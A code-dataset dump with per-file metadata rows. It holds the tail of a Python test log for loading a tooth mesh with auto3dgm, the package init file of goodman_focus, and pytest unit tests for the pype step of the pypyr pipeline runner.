56 @staticmethod
OSError: File /home/safari/Desktop/tutkimus/Slicer/HackathonJAN/testdata/20_Test_Teeth_PLY/.off not present or not allowed filetype: .ply, .obj, .stl
'''
# Result: Success!
#Test case 2: Giving a valid .ply file
#Conditions: filestring refers to an existing supported file
#Expect: When I try to create a mesh, a mesh is successfully created
filestring='/home/safari/Desktop/tutkimus/Slicer/HackathonJAN/testdata/20_Test_Teeth_PLY/12144_U02_Eosimias_crop-smooth.ply'
MeshFactory.mesh_from_file(filestring)
'''
In [12]: filestring='/home/safari/Desktop/tutkimus/Slicer/HackathonJAN/testdata/20_Test_Teeth_PLY/12144_U02_Eosimias_crop-smooth.ply'
In [13]: MeshFactory.mesh_from_file(filestring)
<class 'vtkCommonDataModelPython.vtkPolyData'>
Out[13]: <auto3dgm.mesh.mesh.Mesh at 0x7f85c374fa58>
'''
# Result: Pass
| 42.786667 | 166 | 0.705516 | 419 | 3,209 | 5.267303 | 0.245823 | 0.04531 | 0.077028 | 0.113276 | 0.851835 | 0.794291 | 0.778432 | 0.746715 | 0.746715 | 0.730856 | 0 | 0.037118 | 0.143658 | 3,209 | 74 | 167 | 43.364865 | 0.766012 | 0.164537 | 0 | 0.428571 | 0 | 0.285714 | 0.548204 | 0.531191 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
0e51658cf3fd699affeaa6432d3c3d1ea2aa40d4 | 117 | py | Python | goodman_focus/__init__.py | soar-telescope/goodman_focus | 5a99ddc57af2276a28e6e165089e4be5b03b911c | [
"BSD-3-Clause"
] | null | null | null | goodman_focus/__init__.py | soar-telescope/goodman_focus | 5a99ddc57af2276a28e6e165089e4be5b03b911c | [
"BSD-3-Clause"
] | 16 | 2019-06-26T21:24:30.000Z | 2021-09-21T16:00:11.000Z | goodman_focus/__init__.py | soar-telescope/goodman_focus | 5a99ddc57af2276a28e6e165089e4be5b03b911c | [
"BSD-3-Clause"
] | 1 | 2021-09-20T03:30:31.000Z | 2021-09-20T03:30:31.000Z | from .version import __version__
from .goodman_focus import GoodmanFocus
from .goodman_focus import run_goodman_focus | 39 | 44 | 0.880342 | 16 | 117 | 5.9375 | 0.4375 | 0.378947 | 0.336842 | 0.463158 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094017 | 117 | 3 | 44 | 39 | 0.896226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
0e93ff2c5bf38fa535abe656df3530e9ff558dbd | 39,300 | py | Python | tests/unit/pypyr/steps/pype_test.py | pypyr/pypyr-cli | dc0f694ac0c0e3c2844c1a20788c9af586a8a16e | [
"Apache-2.0"
] | 31 | 2017-03-24T11:27:34.000Z | 2020-05-27T20:06:28.000Z | tests/unit/pypyr/steps/pype_test.py | pypyr/pypyr-cli | dc0f694ac0c0e3c2844c1a20788c9af586a8a16e | [
"Apache-2.0"
] | 89 | 2017-04-12T09:50:32.000Z | 2020-08-13T13:18:36.000Z | tests/unit/pypyr/steps/pype_test.py | pypyr/pypyr-cli | dc0f694ac0c0e3c2844c1a20788c9af586a8a16e | [
"Apache-2.0"
] | 6 | 2017-06-04T14:19:59.000Z | 2020-02-10T13:16:40.000Z | """pype.py unit tests."""
import logging
from unittest.mock import call, Mock
import pytest
from pypyr.context import Context
from pypyr.errors import (
ContextError,
Stop,
KeyInContextHasNoValueError,
KeyNotInContextError)
from pypyr.pipeline import Pipeline
from pypyr.pipedef import PipelineDefinition, PipelineInfo
import pypyr.steps.pype as pype
from tests.common.utils import patch_logger
# region fixtures
def new_pipe_and_args_wrapper(mock_pipe):
"""Return ref to Pipeline new_pipe_and_args, overriding the cls arg.
Reason is normal patch does not patch out the cls arg on a class method.
Intercept the factory method, passing in a mock as type to instantiate.
Args:
mock_pipe: Replace the 1st arg (i.e cls) to the classmethod with me.
"""
# get the reference to the underlying method before it's patched
og_ref = Pipeline.new_pipe_and_args.__func__
def new_pipe_and_args(*args, **kwargs):
# the first arg is cls - for which we're substituting the mock
return og_ref(mock_pipe, *args, **kwargs)
return new_pipe_and_args
@pytest.fixture
def mock_pipe(monkeypatch):
"""Intercept Pipeline.new_pipe_and_args factory method."""
mock_pipe = Mock(spec=Pipeline)
mock_pipe._get_parse_input = Pipeline._get_parse_input
monkeypatch.setattr('pypyr.steps.pype.Pipeline.new_pipe_and_args',
new_pipe_and_args_wrapper(mock_pipe))
return mock_pipe
# endregion fixtures
def get_arb_pipeline_scope(context):
"""Context must be in pipeline scope to get current pipe info."""
pipeline = Pipeline('arb pipe')
pipeline.pipeline_definition = PipelineDefinition(
pipeline=None,
info=PipelineInfo(pipeline_name='arb',
loader=None,
parent=None))
return context.pipeline_scope(pipeline)
# region get_arguments
def test_pype_get_arguments_all():
"""Parse all input from context."""
context = Context({
'pype': {
'name': 'pipe name',
'args': {'a': 'b'},
'out': 'out value',
'pipeArg': 'argument here',
'useParentContext': False,
'skipParse': 'skip parse',
'raiseError': 'raise err',
'loader': 'test loader',
'groups': ['gr'],
'success': 'sg',
'failure': 'fg',
'pyDir': 'arb/dir',
'parent': 'the parent'
}
})
with get_arb_pipeline_scope(context):
(pipeline_name,
args,
out,
use_parent_context,
pipe_arg,
skip_parse,
raise_error,
loader,
groups,
success_group,
failure_group,
py_dir,
parent) = pype.get_arguments(context)
assert pipeline_name == 'pipe name'
assert args == {'a': 'b'}
assert out == 'out value'
assert not use_parent_context
assert skip_parse == 'skip parse'
assert pipe_arg == ['argument', 'here']
assert raise_error == 'raise err'
assert loader == 'test loader'
assert groups == ['gr']
assert success_group == 'sg'
assert failure_group == 'fg'
assert py_dir == 'arb/dir'
assert parent == 'the parent'
def test_pype_get_arguments_all_with_interpolation():
"""Parse all input from context."""
context = Context({
'pipeName': 'pipe name',
'argsHere': {'a': '{pipeName}'},
'outHere': 'out here',
'argHere': 'argument here',
'parentContext': False,
'skipParse': 'skip parse',
'raiseErr': 'raise err',
'loaderHere': 'test loader',
'groups': ['gr'],
'success': 'sg',
'failure': 'fg',
'dir': 'arb/dir',
'parent': 'the parent',
'pype': {
'name': '{pipeName}',
'args': '{argsHere}',
'out': '{outHere}',
'pipeArg': '{argHere}',
'useParentContext': '{parentContext}',
'skipParse': '{skipParse}',
'raiseError': '{raiseErr}',
'loader': '{loaderHere}',
'groups': '{groups}',
'success': '{success}',
'failure': '{failure}',
'pyDir': '{dir}',
'parent': '{parent}'
}
})
with get_arb_pipeline_scope(context):
(pipeline_name,
args,
out,
use_parent_context,
pipe_arg,
skip_parse,
raise_error,
loader,
groups,
success_group,
failure_group,
py_dir,
parent) = pype.get_arguments(context)
assert pipeline_name == 'pipe name'
assert args == {'a': 'pipe name'}
assert out == 'out here'
assert not use_parent_context
assert pipe_arg == ['argument', 'here']
assert skip_parse == 'skip parse'
assert raise_error == 'raise err'
assert loader == 'test loader'
assert groups == ['gr']
assert success_group == 'sg'
assert failure_group == 'fg'
assert py_dir == 'arb/dir'
assert parent == 'the parent'
def test_pype_get_arguments_defaults():
"""Parse all input from context and assign defaults where not specified."""
context = Context({
'pype': {
'name': 'pipe name'
}
})
with get_arb_pipeline_scope(context):
(pipeline_name,
args,
out,
use_parent_context,
pipe_arg,
skip_parse,
raise_error,
loader,
groups,
success_group,
failure_group,
py_dir,
parent) = pype.get_arguments(context)
assert pipeline_name == 'pipe name'
assert args is None
assert out is None
assert use_parent_context
assert isinstance(use_parent_context, bool)
assert pipe_arg is None
assert skip_parse
assert isinstance(skip_parse, bool)
assert raise_error
assert isinstance(raise_error, bool)
assert loader is None
assert groups is None
assert success_group is None
assert failure_group is None
assert py_dir is None
# defaults to current pipeline's parent if cascading loader.
assert parent is None
def test_pype_get_arguments_missing_pype():
"""Missing pype throw."""
context = Context()
with pytest.raises(KeyNotInContextError) as err_info:
pype.get_arguments(context)
assert str(err_info.value) == ("context['pype'] "
"doesn't exist. It must exist for "
"pypyr.steps.pype.")
def test_pype_get_args_not_a_dict():
"""When args not a dict raise."""
context = Context({'pype': {'name': 'blah', 'args': 'arb'}})
with pytest.raises(ContextError) as err_info:
pype.get_arguments(context)
assert str(err_info.value) == (
"pypyr.steps.pype 'args' in the 'pype' context item "
"must be a dict.")
def test_pype_get_out_set_with_use_parent_context():
"""When out is present useParentContext must be false."""
context = Context({'pype': {'name': 'blah',
'out': 'arb',
'useParentContext': True}})
with pytest.raises(ContextError) as err_info:
pype.get_arguments(context)
assert str(err_info.value) == (
"pypyr.steps.pype pype.out is only "
"relevant if useParentContext = False. If you're using the parent "
"context, no need to have out args since their values will already be "
"in context. If you're NOT using parent context and you've specified "
"pype.args, just leave off the useParentContext key and it'll default "
"to False under the hood, or set it to False yourself if you keep it "
"in.")
def test_pype_get_arguments_missing_name():
"""Missing pype name throw."""
context = Context({'pype': {}})
with pytest.raises(KeyNotInContextError) as err_info:
pype.get_arguments(context)
assert str(err_info.value) == (
"pypyr.steps.pype missing 'name' in the 'pype' "
"context item. You need to specify the pipeline name to run another "
"pipeline.")
def test_pype_get_arguments_name_empty():
"""Empty pype name throw."""
context = Context({'pype': {'name': None}})
with pytest.raises(KeyInContextHasNoValueError) as err_info:
pype.get_arguments(context)
assert str(err_info.value) == ("pypyr.steps.pype ['pype']['name'] exists "
"but is empty.")
def test_pype_get_arguments_group_str():
"""Parse group as str input from context."""
context = Context({
'pype': {
'name': 'pipe name',
'groups': 'gr',
}
})
with get_arb_pipeline_scope(context):
(pipeline_name,
args,
out,
use_parent_context,
pipe_arg,
skip_parse,
raise_error,
loader,
groups,
success_group,
failure_group,
py_dir,
parent) = pype.get_arguments(context)
assert pipeline_name == 'pipe name'
assert args is None
assert out is None
assert use_parent_context
assert isinstance(use_parent_context, bool)
assert pipe_arg is None
assert skip_parse
assert isinstance(skip_parse, bool)
assert raise_error
assert isinstance(raise_error, bool)
assert loader is None
assert groups == ['gr']
assert success_group is None
assert failure_group is None
assert py_dir is None
assert parent is None
def test_pype_get_arguments_group_str_interpolate():
"""Parse group as interpolated str input from context."""
context = Context({
'group': 'gr',
'pype': {
'name': 'pipe name',
'groups': '{group}',
}
})
with get_arb_pipeline_scope(context):
(pipeline_name,
args,
out,
use_parent_context,
pipe_arg,
skip_parse,
raise_error,
loader,
groups,
success_group,
failure_group,
py_dir,
parent) = pype.get_arguments(context)
assert pipeline_name == 'pipe name'
assert args is None
assert out is None
assert use_parent_context
assert isinstance(use_parent_context, bool)
assert pipe_arg is None
assert skip_parse
assert isinstance(skip_parse, bool)
assert raise_error
assert isinstance(raise_error, bool)
assert loader is None
assert groups == ['gr']
assert success_group is None
assert failure_group is None
assert py_dir is None
assert parent is None
def test_pype_get_args_no_parent_context():
"""If args set use_parent_context should default False."""
context = Context({
'pype': {
'name': 'pipe name',
'args': {'a': 'b'},
}
})
with get_arb_pipeline_scope(context):
(pipeline_name,
args,
out,
use_parent_context,
pipe_arg,
skip_parse,
raise_error,
loader,
groups,
success_group,
failure_group,
py_dir,
parent) = pype.get_arguments(context)
assert pipeline_name == 'pipe name'
assert args == {'a': 'b'}
assert out is None
assert not use_parent_context
assert pipe_arg is None
assert skip_parse
assert raise_error
assert not loader
assert not groups
assert not success_group
assert not failure_group
assert py_dir is None
assert parent is None
def test_pype_get_pipeargs_no_skip_parse():
"""If pipeArgs set skipParse should default False."""
context = Context({
'pype': {
'name': 'pipe name',
'pipeArg': 'a b c',
}
})
with get_arb_pipeline_scope(context):
(pipeline_name,
args,
out,
use_parent_context,
pipe_arg,
skip_parse,
raise_error,
loader,
groups,
success_group,
failure_group,
py_dir,
parent) = pype.get_arguments(context)
assert pipeline_name == 'pipe name'
assert args is None
assert out is None
assert not use_parent_context
assert pipe_arg == ['a', 'b', 'c']
assert not skip_parse
assert raise_error
assert not loader
assert not groups
assert not success_group
assert not failure_group
assert py_dir is None
assert parent is None
def test_pype_get_args_and_pipearg():
"""Combine pipeArgs and args. Defaults useParentContext to False."""
context = Context({
'pype': {
'name': 'pipe name',
'args': {'a': 'b'},
'pipeArg': 'a b c',
}
})
with get_arb_pipeline_scope(context):
(pipeline_name,
args,
out,
use_parent_context,
pipe_arg,
skip_parse,
raise_error,
loader,
groups,
success_group,
failure_group,
py_dir,
parent) = pype.get_arguments(context)
assert pipeline_name == 'pipe name'
assert args == {'a': 'b'}
assert out is None
assert not use_parent_context
assert pipe_arg == ['a', 'b', 'c']
assert not skip_parse
assert raise_error
assert not loader
assert not groups
assert not success_group
assert not failure_group
assert py_dir is None
assert parent is None
# region cascading
def get_scope_from_info(context, info):
"""Context must be in pipeline scope to get current pipe info."""
pipeline = Pipeline('arb pipe')
pipeline.pipeline_definition = PipelineDefinition(pipeline=None, info=info)
return context.pipeline_scope(pipeline)
def test_pype_gets_args_loader_non_cascading():
"""Loader not cascading."""
context = Context({
'pype': {
'name': 'pipe name'
}
})
info = PipelineInfo(pipeline_name='arb',
loader='arbloader',
parent='noncascading/dir',
is_loader_cascading=False)
with get_scope_from_info(context, info):
pype_args = pype.get_arguments(context)
assert pype_args.pipeline_name == 'pipe name'
assert pype_args.loader is None
assert pype_args.parent is None
def test_pype_get_args_parent_cascading():
"""Same loader as parent with cascade."""
context = Context({
'pype': {
'name': 'pipe name',
'loader': 'arbloader'
}
})
info = PipelineInfo(pipeline_name='arb',
loader='arbloader',
parent='cascading/parent')
with get_scope_from_info(context, info):
pype_args = pype.get_arguments(context)
assert pype_args.pipeline_name == 'pipe name'
assert pype_args.loader == 'arbloader'
assert pype_args.parent == 'cascading/parent'
def test_pype_get_args_parent_not_cascading_parent():
"""A non-cascading loader does not cascade parent."""
context = Context({
'pype': {
'name': 'pipe name',
'loader': 'arbloader'
}
})
info = PipelineInfo(pipeline_name='arb',
loader='arbloader',
parent='noncascading/dir',
is_parent_cascading=False)
with get_scope_from_info(context, info):
pype_args = pype.get_arguments(context)
assert pype_args.pipeline_name == 'pipe name'
assert pype_args.loader == 'arbloader'
assert pype_args.parent is None
def test_pype_get_args_parent_cascading_different_loader_set():
"""Do not cascade when different loader than parent."""
context = Context({
'pype': {
'name': 'pipe name',
'loader': 'arbloader1'
}
})
info = PipelineInfo(
pipeline_name='arb',
loader='arbloader2',
parent='cascading/dir')
with get_scope_from_info(context, info):
pype_args = pype.get_arguments(context)
assert pype_args.pipeline_name == 'pipe name'
assert pype_args.loader == 'arbloader1'
assert pype_args.parent is None
def test_pype_get_args_parent_cascade_no_loader_set():
"""No loader set on parent and no loader on pype with cascade.
This is very edge. pypyr core will normalize loader=None to the file
loader, and to use a custom loader the dev would have to pass a non-None
to run()/load_and_run() to begin with.
It shouldn't ever happen short of some heavy customization where a custom
client loader explicitly sets None the loader property on the Info object.
Which, why? But just in case, here's a test.
"""
context = Context({
'pype': {
'name': 'pipe name'
}
})
info = PipelineInfo(
pipeline_name='arb',
loader=None,
parent='cascading/parent')
with get_scope_from_info(context, info):
pype_args = pype.get_arguments(context)
assert pype_args.pipeline_name == 'pipe name'
assert pype_args.loader is None
assert pype_args.parent == 'cascading/parent'
def test_pype_get_args_parent_cascade_no_loader_no_parent_set():
"""No loader+parent set on parent & no loader+parent on pype with cascade.
This is very edge. pypyr core will normalize loader=None to the file
loader, and to use a custom loader the dev would have to pass a non-None
to run()/load_and_run() to begin with.
It shouldn't ever happen short of some heavy customization where a custom
client loader explicitly sets None the loader property on the Info object.
Which, why? But just in case, here's a test.
"""
context = Context({
'pype': {
'name': 'pipe name'
}
})
info = PipelineInfo(
pipeline_name='arb',
loader=None,
parent=None)
with get_scope_from_info(context, info):
pype_args = pype.get_arguments(context)
assert pype_args.pipeline_name == 'pipe name'
assert pype_args.loader is None
assert pype_args.parent is None
def test_pype_get_parent_set_on_cascading_loader():
"""Always use parent when set even if cascading loader."""
context = Context({
'pype': {
'name': 'pipe name',
'loader': 'arbloader',
'parent': 'arb/from/child'
}
})
info = PipelineInfo(pipeline_name='arb',
loader='arbloader',
parent='ignore me')
with get_scope_from_info(context, info):
pype_args = pype.get_arguments(context)
assert pype_args.pipeline_name == 'pipe name'
assert pype_args.loader == 'arbloader'
assert pype_args.parent == 'arb/from/child'
def test_pype_resolve_from_parent_false_on_cascading_loader():
"""Ignore loader is_parent_cascading when resolveFromParent False."""
context = Context({
'pype': {
'name': 'pipe name',
'loader': 'arbloader',
'resolveFromParent': False
}
})
info = PipelineInfo(pipeline_name='arb',
loader='arbloader',
parent='ignore me')
with get_scope_from_info(context, info):
pype_args = pype.get_arguments(context)
assert pype_args.pipeline_name == 'pipe name'
assert pype_args.loader == 'arbloader'
assert pype_args.parent is None
def test_pype_resolve_from_parent_true_on_cascading_loader():
"""Ignore loader is_parent_cascading when resolveFromParent False."""
context = Context({
'pype': {
'name': 'pipe name',
'loader': 'arbloader',
'resolveFromParent': True
}
})
info = PipelineInfo(pipeline_name='arb',
loader='arbloader',
parent='from parent')
with get_scope_from_info(context, info):
pype_args = pype.get_arguments(context)
assert pype_args.pipeline_name == 'pipe name'
assert pype_args.loader == 'arbloader'
assert pype_args.parent == 'from parent'
# endregion cascading
# endregion get_arguments
# region run_step
def mocked_run_pipeline(*args, **kwargs):
"""Check pipeline name set on context in child pipeline."""
# assert (kwargs['name']
# == kwargs['context'].pipeline_name == 'pipe name')
# assert (kwargs['pipeline_name'] == 'pipe name')
pass
def test_pype_use_parent_context(mock_pipe):
"""Input pype use_parent_context True."""
context = Context({
'pype': {
'name': 'pipe name',
'pipeArg': 'argument here',
'useParentContext': True,
'skipParse': True,
'raiseError': True,
'loader': 'test loader'
}
})
with patch_logger('pypyr.steps.pype', logging.INFO) as mock_logger_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=['argument', 'here'],
parse_input=False,
loader='test loader',
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
mocked_runner.assert_called_once_with(context, None)
assert mock_logger_info.mock_calls == [
call('pyping pipe name, using parent context.'),
call('pyped pipe name.')]
def test_pype_use_parent_context_with_args(mock_pipe):
"""Input pype use_parent_context True with args."""
context = Context({
'k1': 'v1',
'pype': {
'name': 'pipe name',
'args': {'a': 'b'},
'pipeArg': 'argument here',
'useParentContext': True,
'skipParse': True,
'raiseError': True,
'loader': 'test loader'
}
})
with patch_logger('pypyr.steps.pype', logging.INFO) as mock_logger_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
# args merges into context
merged_context = {
'a': 'b',
'k1': 'v1',
'pype': {
'name': 'pipe name',
'args': {'a': 'b'},
'pipeArg': 'argument here',
'useParentContext': True,
'skipParse': True,
'raiseError': True,
'loader': 'test loader'
}
}
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=['argument', 'here'],
parse_input=False,
loader='test loader',
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
mocked_runner.assert_called_once_with(merged_context, None)
assert mock_logger_info.mock_calls == [
call('pyping pipe name, using parent context.'),
call('pyped pipe name.')]
def test_pype_no_parent_context(mock_pipe):
"""Input pype use_parent_context False."""
context = Context({
'pype': {
'name': 'pipe name',
'pipeArg': 'argument here',
'useParentContext': False,
'skipParse': True,
'raiseError': True,
'loader': 'test loader',
}
})
# context.parent = 'arb/dir'
with patch_logger('pypyr.steps.pype', logging.INFO) as mock_logger_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=['argument', 'here'],
parse_input=False,
loader='test loader',
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
# using empty/fresh new context
mocked_runner.assert_called_once_with({}, None)
assert mock_logger_info.mock_calls == [
call('pyping pipe name, without parent context.'),
call('pyped pipe name.')]
def test_pype_args(mock_pipe):
"""Input pype args used as context."""
context = Context({
'pype': {
'name': 'pipe name',
'args': {'a': 'b'}
}
})
with patch_logger('pypyr.steps.pype', logging.INFO) as mock_logger_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=None,
parse_input=False,
loader=None,
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
assert mock_logger_info.mock_calls == [
call('pyping pipe name, without parent context.'),
call('pyped pipe name.')]
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
# using args as context
mocked_runner.assert_called_once_with({'a': 'b'}, None)
def test_pype_args_with_shortcut(mock_pipe, monkeypatch):
"""Input pype args merged into shortcut used as context."""
shortcuts = {'pipe name': {
'pipeline_name': 'sc pipe',
'args': {
'a': 'og',
'c': ['d']
}
}}
monkeypatch.setattr('pypyr.config.config.shortcuts', shortcuts)
context = Context({
'pype': {
'name': 'pipe name',
'args': {'a': 'b'}
}
})
def l_and_r(context, parent):
assert parent is None
assert context == {'a': 'b', 'c': ['d']}
context['c'].append('updated')
context['e'] = 'new'
mock_pipe.return_value.load_and_run_pipeline.side_effect = l_and_r
with patch_logger('pypyr.steps.pype', logging.INFO) as mock_logger_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
mock_pipe.assert_called_once_with(
name='sc pipe',
context_args=None,
parse_input=False,
loader=None,
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
assert mock_logger_info.mock_calls == [
call('pyping pipe name, without parent context.'),
call('pyped pipe name.')]
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
mocked_runner.assert_called_once()
# original shortcut shouldn't mutate
assert shortcuts == {'pipe name': {
'pipeline_name': 'sc pipe',
'args': {
'a': 'og',
'c': ['d']
}
}}
# useParentContext is False, therfore no context mutations in parent.
assert context == {
'pype': {
'name': 'pipe name',
'args': {'a': 'b'}
}}
def test_pype_args_with_out(mock_pipe):
"""Input pype args used as context with out."""
context = Context({
'parentkey': 'parentvalue',
'pype': {
'name': 'pipe name',
'args': {'a': 'b'},
'out': 'a'
}
})
context.parent = 'arb/dir'
with patch_logger('pypyr.steps.pype', logging.INFO) as mock_logger_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=None,
parse_input=False,
loader=None,
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
# using args as new context
mocked_runner.assert_called_once_with({'a': 'b'}, None)
assert mock_logger_info.mock_calls == [
call('pyping pipe name, without parent context.'),
call('pyped pipe name.')]
assert context == {'parentkey': 'parentvalue',
'a': 'b',
'pype': {
'name': 'pipe name',
'args': {'a': 'b'},
'out': 'a'
}
}
def test_pype_args_with_mapping_out(mock_pipe):
"""Input pype args used as context with mapping out."""
context = Context({
'parentkey': 'parentvalue',
'pype': {
'name': 'pipe name',
'args': {'a': 'av', 'b': 'bv', 'c': 'cv'},
'out': {'new-a': 'a',
'new-c': 'c'}
}
})
with patch_logger('pypyr.steps.pype', logging.INFO) as mock_logger_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=None,
parse_input=False,
loader=None,
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
mocked_runner.assert_called_once_with({'a': 'av', 'b': 'bv', 'c': 'cv'},
None)
assert mock_logger_info.mock_calls == [
call('pyping pipe name, without parent context.'),
call('pyped pipe name.')]
assert context == {'parentkey': 'parentvalue',
'new-a': 'av',
'new-c': 'cv',
'pype': {
'name': 'pipe name',
'args': {'a': 'av', 'b': 'bv', 'c': 'cv'},
'out': {'new-a': 'a',
'new-c': 'c'}
}
}
def test_pype_no_skip_parse(mock_pipe):
"""Input pype use_parent_context False."""
context = Context({
'pype': {
'name': 'pipe name',
'pipeArg': 'argument here',
'useParentContext': False,
'skipParse': False,
'raiseError': True
}
})
with patch_logger('pypyr.steps.pype', logging.INFO) as mock_logger_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=['argument', 'here'],
parse_input=True,
loader=None,
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
mocked_runner.assert_called_once_with({}, None)
assert mock_logger_info.mock_calls == [
call('pyping pipe name, without parent context.'),
call('pyped pipe name.')]
def test_pype_no_pipe_arg(mock_pipe):
"""Input pype use_parent_context False."""
context = Context({
'pype': {
'name': 'pipe name',
'pipeArg': None,
'useParentContext': False,
'skipParse': False,
'raiseError': True,
}
})
with patch_logger('pypyr.steps.pype', logging.INFO) as mock_logger_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=None,
parse_input=True,
loader=None,
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
mocked_runner.assert_called_once_with({}, None)
assert mock_logger_info.mock_calls == [
call('pyping pipe name, without parent context.'),
call('pyped pipe name.')]
def mocked_run_pipeline_with_runtime_error(*args, **kwargs):
"""Check pipeline name set on context in child pipeline with arb err."""
assert (kwargs['pipeline_name']
== kwargs['context'].pipeline_name == 'pipe name')
assert (kwargs['pipeline_name'] == 'pipe name')
raise RuntimeError('whoops')
def test_pype_use_parent_context_no_swallow(mock_pipe):
"""Input pype without swallowing error in child pipeline."""
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
mocked_runner.side_effect = RuntimeError('whoops')
context = Context({
'pype': {
'name': 'pipe name',
'pipeArg': 'argument here',
'useParentContext': True,
'skipParse': True,
'raiseError': True
}
})
with patch_logger('pypyr.steps.pype', logging.ERROR) as mock_logger_error:
with pytest.raises(RuntimeError) as err_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
assert str(err_info.value) == "whoops"
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=['argument', 'here'],
parse_input=False,
loader=None,
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
mocked_runner.assert_called_once_with({
'pype': {
'name': 'pipe name',
'pipeArg': 'argument here',
'useParentContext': True,
'skipParse': True,
'raiseError': True
}
}, None)
mock_logger_error.assert_called_once_with(
'Something went wrong pyping pipe name. RuntimeError: whoops')
def test_pype_use_parent_context_with_swallow(mock_pipe):
"""Input pype swallowing error in child pipeline."""
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
mocked_runner.side_effect = RuntimeError('whoops')
context = Context({
'pype': {
'name': 'pipe name',
'pipeArg': 'argument here',
'useParentContext': True,
'skipParse': True,
'raiseError': False,
'loader': 'test loader'
}
})
with patch_logger('pypyr.steps.pype', logging.ERROR) as mock_logger_error:
with get_arb_pipeline_scope(context):
pype.run_step(context)
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=['argument', 'here'],
parse_input=False,
loader='test loader',
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
mocked_runner.assert_called_once_with(context, None)
mock_logger_error.assert_called_once_with(
'Something went wrong pyping pipe name. RuntimeError: whoops')
def mocked_run_pipeline_with_stop(*args, **kwargs):
"""Check pipeline name set on context in child pipeline with Stop."""
assert (kwargs['pipeline_name']
== kwargs['context'].pipeline_name == 'pipe name')
assert (kwargs['pipeline_name'] == 'pipe name')
raise Stop()
def test_pype_use_parent_context_swallow_stop_error(mock_pipe):
"""Input pype doesn't swallow stop error in child pipeline."""
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
mocked_runner.side_effect = Stop()
context = Context({
'pype': {
'name': 'pipe name',
'pipeArg': 'argument here',
'useParentContext': True,
'skipParse': True,
'raiseError': False
}
})
with patch_logger('pypyr.steps.pype', logging.ERROR) as mock_logger_error:
with pytest.raises(Stop) as err_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
assert isinstance(err_info.value, Stop)
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=['argument', 'here'],
parse_input=False,
loader=None,
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
mocked_runner.assert_called_once_with(context, None)
mock_logger_error.assert_not_called()
def test_pype_set_groups(mock_pipe):
"""Input pype with groups set."""
context = Context({
'pype': {
'name': 'pipe name',
'pipeArg': 'argument here',
'useParentContext': True,
'skipParse': True,
'raiseError': True,
'loader': 'test loader',
'groups': 'testgroup',
'success': 'successgroup',
'failure': 'failuregroup',
'pyDir': 'test dir'
}
})
with patch_logger('pypyr.steps.pype', logging.INFO) as mock_logger_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=['argument', 'here'],
parse_input=False,
loader='test loader',
groups=['testgroup'],
success_group='successgroup',
failure_group='failuregroup',
py_dir='test dir'
)
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
mocked_runner.assert_called_once_with(context, None)
assert mock_logger_info.mock_calls == [
call('pyping pipe name, using parent context.'),
call('pyped pipe name.')]
# endregion run_step
# region write_child_context_to_parent
def test_write_child_context_to_parent_wrong_type():
"""When out not a str, list or dict raise."""
with pytest.raises(ContextError) as err_info:
pype.write_child_context_to_parent(3, None, None)
